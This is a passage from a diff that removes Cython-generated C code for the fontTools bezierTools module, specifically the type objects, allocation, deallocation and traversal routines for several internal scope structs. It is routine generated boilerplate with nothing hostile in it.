/*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_i); - Py_CLEAR(p->__pyx_v_pt1); - Py_CLEAR(p->__pyx_v_pt2); - Py_CLEAR(p->__pyx_v_pt3); - Py_CLEAR(p->__pyx_v_pt4); - Py_CLEAR(p->__pyx_v_ts); - Py_CLEAR(p->__pyx_t_0); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)o; - if (p->__pyx_v_i) { - e = (*v)(p->__pyx_v_i, a); if (e) return e; - } - if (p->__pyx_v_pt1) { - e = (*v)(p->__pyx_v_pt1, a); if (e) return e; - } - if (p->__pyx_v_pt2) { - e = (*v)(p->__pyx_v_pt2, a); if (e) return e; - } - if (p->__pyx_v_pt3) { - e = (*v)(p->__pyx_v_pt3, a); if (e) return e; - } - if (p->__pyx_v_pt4) { - e = (*v)(p->__pyx_v_pt4, a); if (e) return e; - } - if (p->__pyx_v_ts) { - e = (*v)(p->__pyx_v_ts, a); if (e) return e; - } - if (p->__pyx_t_0) { - e = (*v)(p->__pyx_t_0, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_3__splitCubicAtTC", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_3__splitCubicAtTC", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_i); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_i) { - e = (*v)(p->__pyx_v_i, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_4_genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_4_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_precision); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - if (p->__pyx_v_precision) { - e = (*v)(p->__pyx_v_precision, a); if (e) return e; - } - return 0; -} - -static int __pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o) { - PyObject* tmp; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - tmp = ((PyObject*)p->__pyx_v_precision); - p->__pyx_v_precision = Py_None; Py_INCREF(Py_None); - Py_XDECREF(tmp); - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_clear, (void *)__pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_5__curve_curve_intersections_t", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_5__curve_curve_intersections_t", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_traverse*/ - __pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o; - #if 